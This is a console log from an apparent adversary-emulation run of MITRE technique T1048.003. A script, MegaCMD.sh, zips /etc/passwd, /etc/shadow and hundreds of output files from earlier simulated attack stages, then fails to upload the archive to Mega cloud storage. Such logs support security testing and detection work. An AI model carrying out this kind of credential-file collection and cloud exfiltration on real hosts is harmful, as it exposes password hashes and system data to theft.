[+] Tactic ID   : T1048.003-2
[+] Technique   : Exfiltration Over Alternative Protocol: Exfiltration to Cloud Storage (MegaCMD)
[+] Command     :
pwd; bash $(pwd)/Dependencies/MegaCMD.sh
[+] Failure
----- ERROR OUTPUT START -----
/home/bas/Documents/LINUX-JSON
[+] Installing Megacmd....
Detected distro: centos, version: 10
Architecture: amd64
Unsupported CentOS version: 10
[+] Starting MEGA CMD Exfiltration...
updating: etc/passwd (deflated 61%)
updating: etc/shadow (deflated 58%)
updating: Output/ (stored 0%)
updating: Output/Precheck/ (stored 0%)
updating: Output/Precheck/precheck_localhost.localdomain.log (deflated 52%)
updating: Output/Precheck/install_fail_x11-utils_20250804_124322.log (stored 0%)
updating: Output/Precheck/install_fail_imagemagick_20250804_124325.log (stored 0%)
updating: Output/Precheck/install_fail_iputils-ping_20250804_124331.log (stored 0%)
updating: Output/Discovery/ (stored 0%)
updating: Output/Discovery/Discovery_RHEL_T1033.txt (deflated 24%)
updating: Output/Discovery/Discovery_RHEL_T1087.001.txt (deflated 29%)
updating: Output/Discovery/Discovery_RHEL_T1497.001.txt (deflated 31%)
updating: Output/Discovery/Discovery_RHEL_T1007.txt (deflated 71%)
updating: Output/Discovery/Discovery_RHEL_T1135.txt (deflated 31%)
updating: Output/Discovery/Discovery_RHEL_T1082.txt (deflated 60%)
updating: Output/Execution/ (stored 0%)
updating: Output/Execution/Execution_RHEL_T1059.004.txt (deflated 29%)
updating: Output/Execution/Execution_RHEL_T1059.004-1.txt (deflated 63%)
updating: Output/Execution/Execution_RHEL_T1059.004-2.txt (deflated 81%)
updating: Output/Execution/Execution_RHEL_T1059.004-3.txt (deflated 25%)
updating: Output/Execution/Execution_RHEL_T1059.004-4.txt (deflated 33%)
updating: Output/Execution/Execution_RHEL_T1059.004-5.txt (deflated 52%)
updating: Output/Execution/Execution_RHEL_T1059.004-6.txt (deflated 80%)
updating: Output/Execution/Execution_RHEL_T1059.004-7.txt (deflated 39%)
updating: Output/Defense_Evasion/ (stored 0%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1014.txt (deflated 65%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1548.003.txt (deflated 54%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1036.005.txt (deflated 35%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.003.txt (deflated 29%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1027.004.txt (deflated 55%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.004.txt (deflated 33%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1553.004.txt (deflated 37%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1036.006.txt (deflated 51%)
updating: Output/Defense_Evasion/T1036.004_Defence_evasion.txt (deflated 87%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1036.004.txt (deflated 31%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1562.004.txt (deflated 55%)
updating: Output/Persistence/ (stored 0%)
updating: Output/Persistence/T1098.004_Persistence.txt (deflated 96%)
updating: Output/Persistence/Persistence_RHEL_T1098.004.txt (deflated 56%)
updating: Output/Persistence/T1543.002_Persistence.txt (deflated 96%)
updating: Output/Persistence/Persistence_RHEL_T1543.002.txt (deflated 51%)
updating: Output/Persistence/T1037.004_Persistence.txt (deflated 97%)
updating: Output/Persistence/Persistence_RHEL_T1037.004.txt (deflated 49%)
updating: Output/Persistence/Persistence_RHEL_T1546.004.txt (deflated 54%)
updating: Output/Persistence/Persistence_RHEL_T1136.001.txt (deflated 31%)
updating: Output/Persistence/Persistence_RHEL_T1053.002.txt (deflated 42%)
updating: Output/Persistence/Persistence_RHEL_T1053.003.txt (deflated 62%)
updating: Output/Persistence_RHEL/ (stored 0%)
updating: Output/Persistence_RHEL/T1546.004_Persistence.txt (deflated 44%)
updating: Output/Persistence_RHEL/T1053.002_Execution.txt (deflated 13%)
updating: Output/Privilege_Escalation/ (stored 0%)
updating: Output/Collection/ (stored 0%)
updating: Output/Collection/Collection_RHEL_T1074.001.txt (deflated 40%)
updating: Output/Collection/Collection_RHEL_T1113.txt (deflated 44%)
updating: Output/Collection/Collection_RHEL_T1560.002.txt (deflated 31%)
updating: Output/Collection_RHEL/ (stored 0%)
updating: Output/Collection_RHEL/T1074.001_Collection.txt (deflated 79%)
updating: Output/Collection_RHEL/T1113_Collection_screenshots/ (stored 0%)
updating: Output/Collection_RHEL/T1560.002_Collection.txt (stored 0%)
updating: Output/Impact/ (stored 0%)
updating: Output/Impact/Impact_RHEL_T1531 .txt (deflated 24%)
updating: Output/Impact/Impact_RHEL_T1496 .txt (deflated 31%)
updating: Output/Impact/Impact_RHEL_T1485 .txt (deflated 39%)
updating: Output/Impact/passwd.gpg (stored 0%)
updating: Output/Impact/Impact_RHEL_T1486 .txt (deflated 28%)
updating: Output/Exfiltration/ (stored 0%)
updating: Output/Exfiltration/gofile_response.json (deflated 28%)
updating: Output/Exfiltration/Exfiltration_RHEL_T1048.003 -3.txt (deflated 40%)
updating: Output/DefenceEvasion_Deb/ (stored 0%)
updating: Output/DefenceEvasion_Deb/T1014_3_Defence_evasion.txt (deflated 68%)
updating: Output/DefenceEvasion_Deb/T1562.004_Defense_evasion.txt (stored 0%)
updating: Output/Precheck/precheck_zeekserver.log (deflated 53%)
updating: Output/Discovery/Discovery_Deb_T1217-1.txt (deflated 55%)
updating: Output/Discovery/Discovery_Deb_T1018-3.txt (deflated 29%)
updating: Output/Discovery/Discovery_Deb_T1217-2.txt (deflated 57%)
updating: Output/Discovery/Discovery_Deb_T1016-1.txt (deflated 78%)
updating: Output/Discovery/Discovery_Deb_T1016-2.txt (deflated 81%)
updating: Output/Discovery/Discovery_Deb_T1016-3.txt (deflated 55%)
updating: Output/Discovery/Discovery_Deb_T1016-4.txt (deflated 71%)
updating: Output/Discovery/Discovery_Deb_T1016-5.txt (deflated 65%)
updating: Output/Discovery/Discovery_Deb_T1083-1.txt (deflated 37%)
updating: Output/Discovery/Discovery_Deb_T1083-2.txt (deflated 35%)
updating: Output/Discovery/Discovery_Deb_T1049-1.txt (deflated 91%)
updating: Output/Discovery/Discovery_Deb_T1049-2.txt (deflated 60%)
updating: Output/Discovery/Discovery_Deb_T1057.txt (deflated 60%)
updating: Output/Discovery/Discovery_Deb_T1069.001-1.txt (deflated 31%)
updating: Output/Discovery/Discovery_Deb_T1069.001-2.txt (deflated 31%)
updating: Output/Discovery/Discovery_Deb_T1069.001-3.txt (deflated 27%)
updating: Output/Discovery/Discovery_Deb_T1069.001-4.txt (deflated 29%)
updating: Output/Discovery/Discovery_Deb_T1069.001-5.txt (deflated 46%)
updating: Output/Discovery/Discovery_Deb_T1069.001-6.txt (deflated 46%)
updating: Output/Discovery/Discovery_Deb_T1201.txt (deflated 50%)
updating: Output/Discovery/Discovery_Deb_T1614.001-1.txt (deflated 46%)
updating: Output/Discovery/Discovery_Deb_T1614.001-2.txt (deflated 31%)
updating: Output/Discovery/Discovery_Deb_T1614.001-3.txt (deflated 37%)
updating: Output/Discovery/Discovery_Deb_T1518.001.txt (deflated 76%)
updating: Output/Discovery/Discovery_Deb_T1018-1.txt (deflated 56%)
updating: Output/Discovery/Discovery_Deb_T1033.txt (deflated 24%)
updating: Output/Discovery/Discovery_Deb_T1087.001.txt (deflated 30%)
updating: Output/Discovery/Discovery_Deb_T1497.001.txt (deflated 32%)
updating: Output/Discovery/Discovery_Deb_T1007.txt (deflated 75%)
updating: Output/Discovery/Discovery_Deb_T1135.txt (deflated 50%)
updating: Output/Discovery/Discovery_Deb_T1082.txt (deflated 61%)
updating: Output/Discovery/Discovery_Deb_T1082-1.txt (deflated 30%)
updating: Output/Discovery/Discovery_Deb_T1082-2.txt (deflated 36%)
updating: Output/Discovery/Discovery_Deb_T1082-3.txt (deflated 27%)
updating: Output/Discovery/Discovery_Deb_T1082-4.txt (deflated 40%)
updating: Output/Discovery/Discovery_Deb_T1087.001-1.txt (deflated 63%)
updating: Output/Discovery/Discovery_Deb_T1087.001-2.txt (deflated 59%)
updating: Output/Discovery/Discovery_Deb_T1087.001-3.txt (deflated 53%)
updating: Output/Discovery/Discovery_Deb_T1087.001-4.txt (deflated 59%)
updating: Output/Discovery/Discovery_Deb_T1082-5.txt (deflated 23%)
updating: Output/Discovery/Discovery_Deb_T1082-6.txt (deflated 22%)
updating: Output/Discovery/Discovery_Deb_T1082-7.txt (deflated 23%)
updating: Output/Discovery/Discovery_Deb_T1082-8.txt (deflated 25%)
updating: Output/Discovery/Discovery_Deb_T1082-9.txt (deflated 32%)
updating: Output/Discovery/Discovery_Deb_T1082-10.txt (deflated 26%)
updating: Output/Discovery/Discovery_Deb_T1082-11.txt (deflated 26%)
updating: Output/Discovery/Discovery_Deb_T1082-12.txt (deflated 26%)
updating: Output/Discovery/Discovery_Deb_T1082-13.txt (deflated 28%)
updating: Output/Discovery/Discovery_Deb_T1082-14.txt (deflated 61%)
updating: Output/Discovery/Discovery_Deb_T1082-15.txt (deflated 53%)
updating: Output/Discovery/Discovery_RHEL_T1033-1.txt (deflated 40%)
updating: Output/Discovery/Discovery_RHEL_T1033-2.txt (deflated 46%)
updating: Output/Discovery/Discovery_RHEL_T1033-4.txt (deflated 26%)
updating: Output/Discovery/Discovery_RHEL_T1033-5.txt (deflated 23%)
updating: Output/Discovery/Discovery_RHEL_T1087.001-1.txt (deflated 55%)
updating: Output/Discovery/Discovery_RHEL_T1087.001-2.txt (deflated 36%)
updating: Output/Discovery/Discovery_RHEL_T1087.001-3.txt (deflated 26%)
updating: Output/Discovery/Discovery_RHEL_T1087.001-4.txt (deflated 28%)
updating: Output/Discovery/Discovery_RHEL_T1087.001-5.txt (deflated 28%)
updating: Output/Discovery/Discovery_RHEL_T1087.001-6.txt (deflated 30%)
updating: Output/Discovery/Discovery_RHEL_T1082-1.txt (deflated 29%)
updating: Output/Discovery/Discovery_RHEL_T1082-2.txt (deflated 29%)
updating: Output/Discovery/Discovery_RHEL_T1082-3.txt (deflated 28%)
updating: Output/Discovery/Discovery_RHEL_T1082-4.txt (deflated 42%)
updating: Output/Discovery/Discovery_RHEL_T1082-5.txt (deflated 24%)
updating: Output/Discovery/Discovery_RHEL_T1082-6.txt (deflated 25%)
updating: Output/Discovery/Discovery_RHEL_T1082-7.txt (deflated 25%)
updating: Output/Discovery/Discovery_RHEL_T1082-8.txt (deflated 30%)
updating: Output/Discovery/Discovery_RHEL_T1082-9.txt (deflated 46%)
updating: Output/Discovery/Discovery_RHEL_T1082-10.txt (deflated 82%)
updating: Output/Discovery/Discovery_RHEL_T1082-11.txt (deflated 40%)
updating: Output/Discovery/Discovery_RHEL_T1082-12.txt (deflated 51%)
updating: Output/Discovery/Discovery_RHEL_T1082-13.txt (deflated 29%)
updating: Output/Discovery/Discovery_RHEL_T1082-14.txt (deflated 60%)
updating: Output/Discovery/Discovery_RHEL_T1217-1.txt (deflated 34%)
updating: Output/Discovery/Discovery_RHEL_T1217-2.txt (deflated 35%)
updating: Output/Discovery/Discovery_RHEL_T1016-1.txt (deflated 62%)
updating: Output/Discovery/Discovery_RHEL_T1016-2.txt (deflated 62%)
updating: Output/Discovery/Discovery_RHEL_T1016-3.txt (deflated 32%)
updating: Output/Discovery/Discovery_RHEL_T1016-4.txt (deflated 53%)
updating: Output/Discovery/Discovery_RHEL_T1016-5.txt (deflated 51%)
updating: Output/Discovery/Discovery_RHEL_T1083-1.txt (deflated 37%)
updating: Output/Discovery/Discovery_RHEL_T1083-2.txt (deflated 85%)
updating: Output/Discovery/Discovery_RHEL_T1049-1.txt (deflated 91%)
updating: Output/Discovery/Discovery_RHEL_T1049-2.txt (deflated 50%)
updating: Output/Discovery/Discovery_RHEL_T1057.txt (deflated 54%)
updating: Output/Discovery/Discovery_RHEL_T1069.001-1.txt (deflated 42%)
updating: Output/Discovery/Discovery_RHEL_T1069.001-2.txt (deflated 42%)
updating: Output/Discovery/Discovery_RHEL_T1069.001-3.txt (deflated 27%)
updating: Output/Discovery/Discovery_RHEL_T1069.001-4.txt (deflated 34%)
updating: Output/Discovery/Discovery_RHEL_T1069.001-5.txt (deflated 42%)
updating: Output/Discovery/Discovery_RHEL_T1069.001-6.txt (deflated 42%)
updating: Output/Discovery/Discovery_RHEL_T1201.txt (deflated 57%)
updating: Output/Discovery/Discovery_RHEL_T1614.001-1.txt (deflated 53%)
updating: Output/Discovery/Discovery_RHEL_T1614.001-2.txt (deflated 32%)
updating: Output/Discovery/Discovery_RHEL_T1614.001-3.txt (deflated 32%)
updating: Output/Discovery/Discovery_RHEL_T1518.001.txt (deflated 87%)
updating: Output/Discovery/Discovery_RHEL_T1018-1.txt (deflated 32%)
updating: Output/Discovery/Discovery_RHEL_T1018-2.txt (deflated 30%)
updating: Output/Execution/Execution_Deb_T1059.004.txt (deflated 29%)
updating: Output/Execution/Execution_Deb_T1059.004-1.txt (deflated 80%)
updating: Output/Execution/Execution_Deb_T1059.004-2.txt (deflated 82%)
updating: Output/Execution/Execution_Deb_T1059.004-3.txt (deflated 25%)
updating: Output/Execution/Execution_Deb_T1059.004-4.txt (deflated 43%)
updating: Output/Execution/Execution_Deb_T1059.004-5.txt (deflated 47%)
updating: Output/Execution/Execution_Deb_T1059.004-6.txt (deflated 35%)
updating: Output/Execution/Execution_Deb_T1059.004-7.txt (deflated 36%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1014-1.txt (deflated 51%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1014.txt (deflated 50%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.001.txt (deflated 39%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1564.003.txt (deflated 47%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.002.txt (deflated 32%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.005.txt (deflated 29%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.006.txt (deflated 41%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.007.txt (deflated 29%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1564.001.txt (deflated 72%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1562.001.txt (deflated 38%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1140.txt (deflated 44%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1564.002.txt (deflated 58%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1548.003.txt (deflated 50%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1036.005.txt (deflated 35%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.003.txt (deflated 33%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1027.004.txt (deflated 55%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.004.txt (deflated 28%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1553.004.txt (deflated 68%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1036.006.txt (deflated 51%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1036.004.txt (deflated 31%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1562.004.txt (deflated 50%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1564.004.txt (deflated 58%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1014-2.txt (deflated 50%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.003-1.txt (deflated 24%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.003-2.txt (deflated 37%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.003-3.txt (deflated 25%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.003-4.txt (deflated 28%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.003-5.txt (deflated 29%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.003-6.txt (deflated 42%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.003-7.txt (deflated 29%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1027.004-1.txt (deflated 55%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1027.004-2.txt (deflated 55%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1027.004-3.txt (deflated 55%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.004-1.txt (deflated 40%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.004-2.txt (deflated 32%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1070.004-3.txt (deflated 32%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1564.001-1.txt (deflated 72%)
updating: Output/Defense_Evasion/Defense_Evasion_Deb_T1564.001-2.txt (deflated 46%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1564.001-1.txt (deflated 72%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1562.001.txt (deflated 38%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1564.004.txt (deflated 52%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1140.txt (deflated 44%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1564.001-2.txt (deflated 46%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1014-1.txt (deflated 51%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1014-2.txt (deflated 50%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.003-1.txt (deflated 24%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.003-2.txt (deflated 37%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.003-3.txt (deflated 25%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.003-4.txt (deflated 28%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.003-5.txt (deflated 29%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.003-6.txt (deflated 42%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.003-7.txt (deflated 29%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1027.004-1.txt (deflated 55%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1027.004-2.txt (deflated 55%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1027.004-3.txt (deflated 55%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.004-1.txt (deflated 40%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.004-2.txt (deflated 32%)
updating: Output/Defense_Evasion/Defense_Evasion_RHEL_T1070.004-3.txt (deflated 32%)
updating: Output/Persistence/Persistence_Deb_T1053.003-2.txt (deflated 57%)
updating: Output/Persistence/Persistence_Deb_T1053.003-3.txt (deflated 32%)
updating: Output/Persistence/Persistence_Deb_T1547.006.txt (deflated 55%)
updating: Output/Persistence/Persistence_Deb_T1098.003.txt (deflated 51%)
updating: Output/Persistence/Persistence_Deb_T1098.004.txt (deflated 56%)
updating: Output/Persistence/Persistence_Deb_T1543.002.txt (deflated 61%)
updating: Output/Persistence/Persistence_Deb_T1037.004.txt (deflated 49%)
updating: Output/Persistence/Persistence_Deb_T1546.004.txt (deflated 55%)
updating: Output/Persistence/Persistence_Deb_T1136.001.txt (deflated 26%)
updating: Output/Persistence/Persistence_Deb_T1053.002.txt (deflated 42%)
updating: Output/Persistence/Persistence_Deb_T1053.003.txt (deflated 61%)
updating: Output/Persistence/Persistence_RHEL_T1053.003-2.txt (deflated 57%)
updating: Output/Persistence/Persistence_RHEL_T1053.003-3.txt (deflated 34%)
updating: Output/Persistence/Persistence_RHEL_T1547.006.txt (deflated 54%)
updating: Output/Persistence/Persistence_RHEL_T1098.003.txt (deflated 51%)
updating: Output/Persistence/Persistence_RHEL_.txt (deflated 31%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.001.txt (deflated 40%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.001-1.txt (deflated 35%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.001-2.txt (deflated 34%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.001-3.txt (deflated 36%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.001-.txt (deflated 37%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1574.006.txt (deflated 81%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1574.006-1.txt (deflated 36%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1548.001.txt (deflated 29%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1548.001-1.txt (deflated 43%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1548.001-2.txt (deflated 35%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1548.001-3.txt (deflated 35%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1548.001-.txt (deflated 30%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1574.006.txt (deflated 76%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1574.006-1.txt (deflated 81%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.002.txt (deflated 34%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.003.txt (deflated 34%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.004.txt (deflated 37%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.005.txt (deflated 29%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.006.txt (deflated 45%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.007.txt (deflated 37%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1574.007.txt (deflated 35%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1574.008.txt (deflated 27%)
updating: Output/Privilege_Escalation/Privilege_Escalation_Deb_T1548.008.txt (deflated 27%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1548.001-4.txt (deflated 38%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1548.001-5.txt (deflated 28%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1548.001-6.txt (deflated 46%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1548.001-7.txt (deflated 28%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1574.006-2.txt (deflated 35%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1574.008.txt (deflated 56%)
updating: Output/Privilege_Escalation/Privilege_Escalation_RHEL_T1548.008.txt (deflated 49%)
updating: Output/Collection/T1074.001_Collection.txt (deflated 79%)
updating: Output/Collection/T1113_Collection_screenshots/ (stored 0%)
updating: Output/Collection/T1113_Collection_screenshots/T1113_desktop.xwd (deflated 98%)
updating: Output/Collection/T1113_Collection_screenshots/T1113_desktop.png (deflated 6%)
updating: Output/Collection/Collection_Deb_T1113-1.txt (deflated 41%)
updating: Output/Collection/Collection_Deb_T1113-2.txt (deflated 31%)
updating: Output/Collection/Collection_Deb_T1113-3.txt (deflated 31%)
updating: Output/Collection/Collection_Deb_T1560.002-1.txt (deflated 41%)
updating: Output/Collection/Collection_Deb_T1560.002-2.txt (deflated 44%)
updating: Output/Collection/Collection_Deb_T1560.002-3.txt (deflated 39%)
updating: Output/Collection/Collection_Deb_T1560.002-4.txt (deflated 38%)
updating: Output/Collection/Collection_Deb_T1005.txt (deflated 62%)
updating: Output/Collection/Collection_Deb_T1560.001-1.txt (deflated 48%)
updating: Output/Collection/Collection_Deb_T1560.001-2.txt (deflated 46%)
updating: Output/Collection/Collection_Deb_T1115.txt (deflated 58%)
updating: Output/Collection/Collection_Deb_T1560.002.txt (deflated 31%)
updating: Output/Collection/Collection_Deb_T1074.001.txt (deflated 41%)
updating: Output/Collection/Collection_Deb_T1113.txt (deflated 31%)
updating: Output/Collection/Collection_RHEL_T1113-1.txt (deflated 41%)
updating: Output/Collection/Collection_RHEL_T1113-2.txt (deflated 33%)
updating: Output/Collection/Collection_RHEL_T1113-3.txt (deflated 43%)
updating: Output/Collection/Collection_RHEL_T1560.002-1.txt (deflated 41%)
updating: Output/Collection/Collection_RHEL_T1560.002-2.txt (deflated 44%)
updating: Output/Collection/Collection_RHEL_T1560.002-3.txt (deflated 39%)
updating: Output/Collection/Collection_RHEL_T1560.002-4.txt (deflated 38%)
updating: Output/Collection/Collection_RHEL_T1005.txt (deflated 63%)
updating: Output/Collection/Collection_RHEL_T1560.001-1.txt (deflated 48%)
updating: Output/Collection/Collection_RHEL_T1560.001-2.txt (deflated 46%)
updating: Output/Collection/Collection_RHEL_T1115.txt (deflated 55%)
updating: Output/Impact/Impact_Deb_T1531 .txt (deflated 30%)
updating: Output/Impact/Impact_Deb_T1496 .txt (deflated 31%)
updating: Output/Impact/Impact_Deb_T1485 .txt (deflated 39%)
updating: Output/Impact/Impact_Deb_T1486 .txt (deflated 28%)
updating: Output/Exfiltration/Exfiltration_Deb_T1048.003 -3.txt (deflated 40%)
updating: Output/Exfiltration/Exfiltration_Deb_T1048.003-2.txt (deflated 87%)
updating: Output/Exfiltration/Exfiltration_Deb_T1048.003-1.txt (deflated 46%)
updating: Output/Exfiltration/Exfiltration_RHEL_T1048.003-2.txt (deflated 89%)
updating: Output/Exfiltration/Exfiltration_RHEL_T1048.003-1.txt (deflated 60%)
updating: Output/Persistence_Deb/ (stored 0%)
updating: Output/Persistence_Deb/T1543.002_Cleanup.txt (deflated 53%)
updating: Output/Persistence_Deb/T1546.004_Persistence.txt (stored 0%)
updating: Output/Persistence_Deb/T1053.002_Execution.txt (deflated 12%)
updating: Output/DefenceEvasion_RHEL/ (stored 0%)
updating: Output/DefenceEvasion_RHEL/T1014_3_Defence_evasion.txt (deflated 68%)
[+] Zipping successful: localhost.localdomain.zip
[+] Logging in to Mega...
/home/bas/Documents/LINUX-JSON/Dependencies/MegaCMD.sh: line 38: /usr/bin/mega-login: No such file or directory
Uploading to Mega...
/home/bas/Documents/LINUX-JSON/Dependencies/MegaCMD.sh: line 42: /usr/bin/mega-put: No such file or directory
[-] Upload failed
----- ERROR OUTPUT END -----
